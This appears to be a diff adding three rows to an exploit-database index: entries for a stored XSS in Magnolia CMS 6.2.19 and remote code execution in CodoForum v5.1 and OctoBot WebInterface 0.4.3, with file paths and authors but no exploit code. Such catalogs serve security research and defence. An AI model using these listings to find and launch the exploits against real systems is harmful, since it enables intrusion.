+50976,exploits/php/webapps/50976.txt,"Magnolia CMS 6.2.19 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Giulio Garzia Ozozuz",webapps,php,
+50978,exploits/php/webapps/50978.py,"CodoForum v5.1 - Remote Code Execution (RCE)",1970-01-01,"Krish Pandey",webapps,php,
+50979,exploits/multiple/webapps/50979.py,"OctoBot WebInterface 0.4.3 - Remote Code Execution (RCE)",1970-01-01,"Thomas Knudsen",webapps,multiple,